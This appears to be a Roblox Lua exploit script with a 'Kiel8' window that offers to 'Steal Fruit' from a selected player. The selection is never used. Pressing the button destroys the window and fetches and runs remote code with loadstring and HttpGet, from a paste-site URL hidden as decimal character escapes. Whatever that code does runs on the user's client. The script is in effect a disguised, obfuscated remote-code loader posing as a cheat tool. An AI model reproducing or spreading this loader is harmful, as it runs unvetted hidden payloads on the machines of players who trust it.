local HvL = game:GetService("Players")
local xTf = HvL.LocalPlayer

local ZqE = Instance.new("ScreenGui")
ZqE.Name = "Kiel8Gui"
ZqE.ResetOnSpawn = false
ZqE.Parent = xTf:WaitForChild("PlayerGui")

local UaK = Instance.new("Frame")
UaK.Size = UDim2.new(0, 300, 0, 400)
UaK.Position = UDim2.new(0.5, 0, 0.5, 0)
UaK.AnchorPoint = Vector2.new(0.5, 0.5)
UaK.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
UaK.BorderSizePixel = 0
UaK.Active = true
UaK.Draggable = true
UaK.Parent = ZqE

local KyM = Instance.new("Frame")
KyM.Size = UDim2.new(1, 0, 0, 40)
KyM.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
KyM.Parent = UaK

local VyN = Instance.new("TextLabel")
VyN.Size = UDim2.new(1, -40, 1, 0)
VyN.Position = UDim2.new(0, 10, 0, 0)
VyN.BackgroundTransparency = 1
VyN.Text = "Kiel8"
VyN.TextColor3 = Color3.fromRGB(0, 170, 255)
VyN.Font = Enum.Font.GothamBold
VyN.TextSize = 16
VyN.TextXAlignment = Enum.TextXAlignment.Left
VyN.Parent = KyM

local WpC = Instance.new("TextButton")
WpC.Size = UDim2.new(0, 40, 1, 0)
WpC.Position = UDim2.new(1, -40, 0, 0)
WpC.Text = "X"
WpC.Font = Enum.Font.GothamBold
WpC.TextSize = 20
WpC.BackgroundTransparency = 1
WpC.TextColor3 = Color3.fromRGB(255, 80, 80)
WpC.Parent = KyM
WpC.MouseButton1Click:Connect(function()
    UaK.Visible = false
end)

local YoL = Instance.new("Frame")
YoL.Size = UDim2.new(1, -20, 0, 0)
YoL.Position = UDim2.new(0, 10, 0, 50)
YoL.BackgroundTransparency = 1
YoL.Parent = UaK

local Zlr = Instance.new("UIListLayout")
Zlr.Padding = UDim.new(0, 5)
Zlr.SortOrder = Enum.SortOrder.LayoutOrder
Zlr.Parent = YoL

local qHL = nil

local vPC = 0
for _, Jwx in ipairs(HvL:GetPlayers()) do
    if Jwx ~= xTf and vPC < 4 then
        vPC += 1
        local OzR = Instance.new("TextButton")
        OzR.Size = UDim2.new(1, 0, 0, 40)
        OzR.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
        OzR.TextColor3 = Color3.fromRGB(255, 255, 255)
        OzR.Font = Enum.Font.GothamBold
        OzR.TextSize = 16
        OzR.Text = Jwx.Name
        OzR.Parent = YoL

        OzR.MouseButton1Click:Connect(function()
            if qHL then
                qHL.BackgroundColor3 = Color3.fromRGB(60, 60, 60)
            end
            qHL = OzR
            OzR.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
        end)
    end
end

YoL.Size = UDim2.new(1, -20, 0, Zlr.AbsoluteContentSize.Y)

local Rdy = Instance.new("TextButton")
Rdy.Size = UDim2.new(1, -20, 0, 50)
Rdy.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
Rdy.TextColor3 = Color3.fromRGB(255, 255, 255)
Rdy.Font = Enum.Font.GothamBold
Rdy.TextSize = 18
Rdy.Text = "Steal Fruit"
Rdy.Parent = UaK

local function Eya()
    local NzS = YoL.AbsolutePosition
    local HeU = YoL.AbsoluteSize
    local Uic = UaK.AbsolutePosition
    local Vem = (NzS.Y - Uic.Y) + HeU.Y + 10
    Rdy.Position = UDim2.new(0, 10, 0, Vem)
end

task.defer(function()
    Eya()
end)

Zlr:GetPropertyChangedSignal("AbsoluteContentSize"):Connect(function()
    YoL.Size = UDim2.new(1, -20, 0, Zlr.AbsoluteContentSize.Y)
    Eya()
end)

local Clq = Instance.new("TextLabel")
Clq.Size = UDim2.new(1, 0, 0, 30)
Clq.Position = UDim2.new(0, 0, 1, -30)
Clq.BackgroundTransparency = 1
Clq.TextColor3 = Color3.fromRGB(255, 100, 100)
Clq.Text = ""
Clq.Font = Enum.Font.GothamBold
Clq.TextSize = 14
Clq.Parent = UaK

local obfURL = "\104\116\116\112\115\58\47\47\112\97\115\116\101\46\101\101\47\114\47\103\57\102\69\110\56\69\108"

Rdy.MouseButton1Click:Connect(function()
    if qHL then
        ZqE:Destroy()
        local ok, er = pcall(function()
            loadstring(game:HttpGet(obfURL))()
        end)
        if not ok then
            warn("Error loading steal script: " .. tostring(er))
        end
    else
        Clq.Text = "⚠️ Please select a player first!"
        task.delay(3, function()
            Clq.Text = ""
        end)
    end
end)
